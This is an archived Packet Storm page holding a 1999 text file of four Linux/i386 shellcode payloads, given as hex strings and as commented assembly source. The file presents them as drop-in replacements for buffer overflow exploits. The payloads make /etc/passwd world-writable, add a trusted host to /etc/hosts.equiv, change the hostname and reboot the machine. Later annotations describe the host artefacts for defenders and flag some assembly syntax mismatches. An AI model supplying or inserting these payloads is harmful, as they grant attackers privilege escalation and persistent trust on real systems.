
asmcodes.txt

🗓️ 17 Aug 1999 00:00:00Reported by Packet StormType 

Assembly code examples for buffer overflow exploits and actions on system files.

Code
`  
[ http://www.rootshell.com/ ]  
  
-----------------[ begin asmcodes.txt ]---------------------  
  
-- Assembly drop in replacements --  
(Probably useless, but can be a little fun ;-) )  
  
Here are some assembly instructions that you can drop into your favorite  
buffer overflow exploit. Generally, replacing existing shellcodes in  
existing buffer overruns with one of these is all you need to do. Feel free to  
modify and experiment with these. (Sorry about the null's in them before  
;-) )  
  
/* This one changes the mode on /etc/passwd to 777 */  
/* Decodes to the first "Source code" listing below:
     chmod("/etc/passwd", 0777); exit();
   Linux/i386 int 0x80 syscalls. The path is not NUL-terminated in the
   array (no \x00 byte); the code writes the terminator itself at run time
   (mov [ebx+11], al with al == 0), which clobbers the byte after the string.
   Host artefact for defenders: /etc/passwd becoming world-writable (0777);
   a file-integrity / mode-change monitor on /etc/passwd sees it. */  
char shellcode[]=  
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x1d"  
"\x01\xfb\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9\xff\x01\x31\xc0\xb0"  
"\x0f\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f\x65\x74\x63\x2f\x70\x61"  
"\x73\x73\x77\x64\x89\xec\x5d\xc3";  
  
/* This one creates /etc/hosts.equiv with a host called b00ger */  
/* Decodes to the second "Source code" listing below:
     fd = open("/etc/hosts.equiv", O_WRONLY|O_CREAT|O_APPEND, 0644);
     write(fd, "b00ger\n", 7); exit();
   The \x01 between the path and "b00ger" is a placeholder that the code
   overwrites with NUL at run time. The open() return value is not checked:
   on failure the write() targets a negative fd and fails harmlessly.
   Host artefact for defenders: a new or appended /etc/hosts.equiv entry
   ("b00ger"), i.e. rlogin/rsh trust granted to that host name. */  
char shellcode[]=  
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35"  
"\x01\xfb\x31\xc0\x88\x43\x10\x31\xc9\x66\xb9\x41\x04\x31\xd2\x66\xba"  
"\xa4\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x46\x01\xf9\x31"   
"\xd2\xb2\x07\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f\x65"  
"\x74\x63\x2f\x68\x6f\x73\x74\x73\x2e\x65\x71\x75\x69\x76\x01\x62\x30"  
"\x30\x67\x65\x72\x0a\x89\xec\x5d\xc3";  
  
/* This one is useless: it just changes the hostname to yEw_r_0wn3d */  
/* Decodes to the third "Source code" listing below:
     sethostname("yEw_r_0wn3d", 11); exit();
   sethostname() only succeeds with CAP_SYS_ADMIN (root); without it the
   call fails and the payload merely exits. Host artefact: unexpected
   hostname change (visible in logs, prompts, syslog tags). */  
char shellcode[]=  
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff"  
"\x31\xc0\xb0\x4a\x31\xdb\xb3\x16\x01\xfb\x31\xc9\xb1"  
"\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x79\x45\x77\x5f"  
"\x72\x5f\x30\x77\x6e\x33\x64\x89\xec\x5d\xc3";  
  
/* This is also useless: it just reboots an x86 machine */  
/* Decodes to the fourth "Source code" listing below:
     sync();
     reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_RESTART);
     exit();
   reboot() needs CAP_SYS_BOOT; as non-root it fails and the payload exits.
   Effect is denial of service only (immediate restart), nothing persists
   beyond what sync() flushed. */  
char shellcode[]=  
"\xeb\x03\x5f\xeb\x05\xe8\xf8\xff"  
"\xff\xff\x31\xc0\xb0\x24\xcd\x80\x31\xc0\xb0"  
"\x58\xbb\xad\xde\xe1\xfe\xb9\x69\x19\x12\x28"  
"\xba\x67\x45\x23\x01\xcd\x80\x31\xc0\xb0\x01"  
"\xcd\x80\x89\xec\x5d\xc3";  
  
  
-- Source code --  
  
# changes mode on /etc/passwd to 777   
# making it writeable by anyone.   
#  
# Equivalent C: chmod("/etc/passwd", 0777); exit();  
# Target: Linux/i386, GAS AT&T syntax, int 0x80 ABI  
#   (eax = syscall number, ebx/ecx/edx = args 1..3).  
# Layout is position-dependent: the jmp/call/popl trick below loads  
# the address of `yo` into edi, and $(phile-yo) is a label difference  
# relative to `yo`, so instruction order and encodings must not change.  
  
jmp rootshell  
hey:  
popl %edi # edi = return address pushed by `call hey` = address of `yo`  
jmp yo  
rootshell:  
call hey  
yo: # yo! w3rD!  
# chmod() is system call 15 (0xf)  
# (see /usr/include/asm/unistd.h)  
# eax contains syscall number   
xorl %ebx,%ebx # ebx has path to file  
movb $(phile-yo),%bl # byte offset of the path string from `yo` (must fit in 8 bits)  
addl %edi,%ebx   # ebx = &"/etc/passwd"  
xorb %al,%al # clear out al  
movb %al,11(%ebx) # length of filename (11): store NUL terminator one past the 11-byte .ascii (overwrites whatever follows it)  
xorl %ecx,%ecx # clear out ecx  
movw $00777,%cx # ecx contains mode 777  
xorl %eax,%eax # clear out eax  
movb $0xf,%al # syscall 15 (0xf) is chmod (not chown; see header above)  
int $0x80 # interrupt (make call) -- return value in eax is not checked  
xorl %eax,%eax # clear eax  
movb $0x01,%al # syscall 1 (0x01) is exit  
int $0x80 # interrupt (make call) -- ebx still holds the path pointer, so exit status is its low byte  
phile:  
.ascii \"/etc/passwd\" # /etc/passwd (11) -- .ascii adds no NUL; see movb above  
  
-------------------------  
  
# Creates the file /etc/hosts.equiv if it does  
# not exist (or appends to if it does) and will  
# insert the host: b00ger  
# changing this should be trivial  
#  
# Equivalent C:  
#   fd = open("/etc/hosts.equiv", O_WRONLY|O_CREAT|O_APPEND, 0644);  
#   write(fd, "b00ger\n", 7); exit();  
# Target: Linux/i386, GAS AT&T syntax, int 0x80 ABI.  
# Position-dependent: edi = address of `phoo`, and $(file-phoo) /  
# $(string-phoo) are label differences relative to it.  
  
jmp rootshell   
coded_by_bmV:   
popl %edi # edi = address of `phoo` (return address of the call below)  
jmp phoo  
rootshell:  
call coded_by_bmV  
phoo: # ok. I meant 'foo'  
# open() is system call 5   
# (see /usr/include/asm/unistd.h)  
# eax contains syscall number  
# ebx will have filename  
# ecx contains open flags  
# edx contains mode of file  
# ->file is handle returned to eax  
xorl %ebx,%ebx # clear ebx  
movb $(file-phoo),%bl # filename to open in ebx  
addl %edi,%ebx # ebx = &"/etc/hosts.equiv"  
xorl %al, %al # clear out al -- NOTE(review): `xorl` with 8-bit operands is an operand-size mismatch; the hex listing above encodes xorl %eax,%eax here  
movb %al,16(%ebx) # /etc/hosts.equiv (16): overwrite the `.byte 1` placeholder after the path with NUL  
xorl %ecx,%ecx # clear out ecx  
movw $0x441,%cx # O_WRONLY | O_CREAT | O_APPEND  
xorl %edx,%edx # clear out edx  
movw $00644,%dx # mode 0644 -rw-r--r--  
xorl %eax,%eax # clear eax  
movb $0x5,%al # syscall 5 (0x5) is open()  
int $0x80 # interrupt (make call)  
# write() is system call 4  
# (see /usr/include/asm/unistd.h)  
# eax contains syscall 4 (write)  
# ebx will have file handle  
# ecx will point to "b00ger"  
# edx is strlen("b00ger");  
movl %eax,%ebx # move file handle to ebx -- no error check: on open() failure this is -errno and write() below fails  
xorl %ecx, %ecx # clear out ecx  
movb $(string-phoo),%cl # put "b00ger" in ecx  
addl %edi,%ecx # ecx = &"b00ger\n"  
xorl %edx,%edx # clear edx  
movb $7,%dl # strlen("b00ger") ==7 (includes the trailing newline)  
xorl %eax,%eax # clear out eax  
movb $0x04,%al # syscall 4 is write()  
int $0x80 # interrupt (make call)  
xorl %eax,%eax # clean out eax  
movb $0x01,%al # syscall 1 (0x01) is exit()  
int $0x80 # interrupt (make call) -- exit status is the low byte of ebx (the fd)  
# exit() should close file  
file:  
.ascii \"/etc/hosts.equiv\"   
.byte 1 # placeholder for the terminating NUL (keeps the array free of \x00); patched at run time  
string:  
.ascii \"b00ger\n\"  
  
-------------------------  
  
# written just for grins ;-)  
# code to change to hostname of the  
# target machine to: yEw_r_0wn3d   
# Yes, I know this is useless :P  
#  
# Equivalent C: sethostname("yEw_r_0wn3d", 11); exit();  
# Target: Linux/i386, GAS AT&T syntax, int 0x80 ABI.  
# sethostname() needs CAP_SYS_ADMIN; as an unprivileged user it fails  
# (return value is not checked) and the code just exits.  
# Position-dependent: edi = address of `asmcode`; $(string-asmcode)  
# is a label difference relative to it.  
  
jmp rootshell  
by_bm5:  
popl %edi # edi = address of `asmcode`  
jmp asmcode  
rootshell:  
call by_bm5  
asmcode: # assembly code ?  
# 74 (0x4a) is sethostname()  
# (see /usr/include/asm/unistd.h)  
# eax will have syscall 74  
# ebx points to "yEw_r_0wn3d"  
# ecx= strlen("yEw_r_0wn3d")==11  
xorl %eax,%eax # clear out eax  
movb $0x4a,%al # move 74 (sethostname()) to al  
xorl %ebx,%ebx # clear out ebx  
movb $(string-asmcode),%bl # put yEw_r_0wn3d in ebx  
addl %edi,%ebx # ebx = &"yEw_r_0wn3d"  
xorl %ecx,%ecx # clear out ecx  
movb $0x0b,%cl # strlen("yEw_r_0wn3d")==0xb -- length is passed explicitly, so no NUL terminator is needed  
int $0x80 # interrupt (make call)  
xorl %eax,%eax # clear out eax  
movb $0x01,%al # syscall 1 (0x01) is exit()  
int $0x80 # interrupt (make call)  
.byte # NOTE(review): `.byte` with no operand emits nothing; the hex listing above has the string immediately after the code  
string:  
.ascii \"yEw_r_0wn3d\"  
  
-------------------------  
  
# reboots a Linux x86 box   
# also quite useless, but   
# good for learning.  
#  
# Equivalent C:  
#   sync();  
#   reboot(LINUX_REBOOT_MAGIC1, LINUX_REBOOT_MAGIC2, LINUX_REBOOT_CMD_RESTART);  
#   exit();  
# Target: Linux/i386, GAS AT&T syntax, int 0x80 ABI.  
# reboot() needs CAP_SYS_BOOT; as non-root it fails and execution falls  
# through to exit(). Effect is denial of service only.  
# This listing uses no position-dependent data: the popl %edi below is  
# never read (kept for symmetry with the other listings).  
  
jmp rootshell   
coded_by_bmV:  
popl %edi # edi = address of `reb00t` (unused in this listing)  
jmp reb00t  
rootshell:  
call coded_by_bmV  
reb00t: # reboot Linux  
# sync() is syscall 36  
# (see /usr/include/asm/unistd.h)  
xorl %eax,%eax # clear out eax  
movb $0x24,%eax # make syscall to sync() -- NOTE(review): movb with a 32-bit destination is an operand-size mismatch; the hex listing above encodes an 8-bit move into al  
int $0x80 # interrupt (make call)  
# reboot() is syscall 88 (0x58)  
# (see /usr/include/asm/unistd.h)  
# eax contains syscall 88 (reboot)  
# ebx will contain magic  
# ecx will contain magic2  
# (see manual page for reboot)  
xorl %eax,%eax # clear out eax  
movb $0x58,%eax # move 88 (reboot()) to eax -- NOTE(review): same operand-size mismatch as the sync() call above  
movl $0xfee1dead,%ebx # put magic into ebx (LINUX_REBOOT_MAGIC1)  
movl $672274793,%ecx # put magic2 into ecx (LINUX_REBOOT_MAGIC2 == 0x28121969)  
movl $0x1234567,%edx # put flag into edx (LINUX_REBOOT_CMD_RESTART: restart, no halt/power-off)  
# read reboot manpage!  
int $0x80 # interrupt (make call) -- does not return on success  
xorl %eax,%eax # clear out eax  
movb $0x01,%al # syscall 1 (0x01) is exit() -- reached only if reboot() failed (e.g. not root)  
int $0x80 # interrupt (make call)  
  
-------------------------  
  
--> Have fun!  
`
